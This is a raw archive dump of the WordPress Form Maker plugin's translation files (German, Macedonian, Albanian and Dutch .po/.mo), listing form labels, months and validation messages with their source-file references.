#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "Feld ist erforderlich."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Dies ist keine gültige E-Mail-Adresse."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Sie können keine früheren Daten auszuwählen. Wählen Sie ein Datum ausgehend "
"von der aktuellen."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "die "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "Wert muss zwischen "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Menge "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Ihr Ergebnis sollte kleiner sein als "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Titel"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Vorname "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Nachname"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Zweiter Vorname"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Vorwahl"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Telefonnummer"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dollar "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "cents "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "aus "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "zu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "gehen "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "rücksetzen "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Wählen Sie ein Feld "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Wählen Sie ein Datum"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-mk_MK.mo000060400000011015152434416630012167 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��
A
#L
p

}
�

�
�
�
H�
LAP���	��������$	.=N.l�����n
.q
�
%�
�
Z�
t>6���6��3C�D<SE���Gi%�5�4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:00+0400
PO-Revision-Date: 2015-05-22 17:01+0400
Last-Translator: 
Language-Team: 
Language: mk
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
априлПовикувачкиот бројавгустЦентиГрадЗемјадекемвриДолариГрешка, е-мејл порака не беше испратена.Грешка, датотеката не може да се премести.Грешка, неправилна безбедносен код.февруарипрв,Ододат јануаријулијуниПоследнамартМајСреднаНишто не е доставен.ноемвриоктомвриТелефонски бројПоштенски / Поштенски кодКолРесетирање Одберете датумОдберете поле септемвриЖал ми е, не ви е дозволено да испратите овој тип на датотека.Држава / Покраина / РегионУлица и број,Улица и број Линија 2НаНа датотека ја надминува дозволената големина наОва поле %s бара единствен влез и оваа вредност е веќе поднесено.Ова не е валидна емаил адреса.НасловДаВерификација врска е валиден.Не можете да изберете поранешниот датуми. Изберете датум почнувајќи од сегашната.Вашиот е-мејл адреса е веќе потврден.Вашиот е-мејл беше успешно потврдена.Проверка на вашата е-маил истече.Твојата форма беше успешно поднесени.Вашата IP е во црната листа. Ве молиме контактирајте го веб-сајтот администратор.Вашиот резултат треба да биде помал од поле е задолжително.вредност мора да биде помеѓу languages/form_maker-sq.mo000060400000007341152434416630011623 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
G
Y
_
d
j
o
w
�
'�
!�
�
�
�
�
 %)-KSYk}����@��3)7Xa.���(�W#
1{
)�
)�
U!*w�"�4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:04+0400
PO-Revision-Date: 2015-05-22 17:04+0400
Last-Translator: 
Language-Team: 
Language: sq
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
PrillPrefiks i rrethitGushtCentQytetVendDhjetorDollarëGabim, e-mail nuk u dërgua.Gabim, skedari nuk mund të zhvendoset.Gabim, Kodi i gabuar i Sigurimit.ShkurtI parëNgashkoni JanarKorrikQershorI funditMarsMajMesAsgjë nuk është dorëzuar.NëntorTetorNumri i telefonitPostal / Zip CodeSasiaResetZgjidh një datëZgjidh një Field ShtatorNa vjen keq, ju nuk jeni i lejuar të ngarkoni këtë lloj file.Shteti / Provinca / RajoniAdresa RrugaLine Rruga Adresa 2TheDosja e tejkalon madhësinë e lejuar tëKjo fushë %s kërkon një hyrje të veçantë dhe kjo vlerë është dorëzuar tashmë.Kjo nuk është një adresë e vlefshme email.TitulliPër tëLidhja Verifikimi është i pavlefshëm.Ju nuk mund të zgjidhni ish datat. Zgjidhni një datë duke filluar nga ai i tanishmi.Adresa juaj e emailit është verifikuar tashmë.Emaili juaj është verifikuar me sukses.Verifikimi juaj e emailit ka mbaroi koha.Forma juaj u dërgua me sukses.Ip juaj është në listën e zezë. Ju lutem kontaktoni administratorin e internetitRezultati juaj duhet të jetë më pak se fushë është e nevojshme.Vlera duhet të jetë në mes të languages/form_maker-nl_NL.po000060400000056617152434416630012217 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:02+0400\n"
"PO-Revision-Date: 2015-05-22 17:02+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: nl\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Adres"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Adres regel 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Plaats"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Staat / Provincie / Regio"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Postcode"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Land"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "januari"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "februari"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "maart"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "april"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "mei"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "juni"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "juli"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "augustus"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "september"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "oktober"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "november"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "december"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Fout, onjuiste beveiligingscode."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "Din IP er sortlistet. Kontakt venligst hjemmesiden administrator"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Het bestand overschrijdt de toegestane grootte van"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Sorry, je hebt geen toestemming om dit type bestand te uploaden."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Fout, het bestand kan niet worden verplaatst."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "Dit veld %s verwacht een unieke invoer en deze waarde is al gebruikt."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "FOUT: e-mail is niet verzonden."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Er is niets verzonden."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Uw formulier is verzonden."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "FOUT: e-mail is niet verzonden."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Uw e-mailadres is al geverifieerd."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Uw e-mail is met succes geverifieerd."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Uw e-verificatie is verlopen."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Verificatie link is ongeldig."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
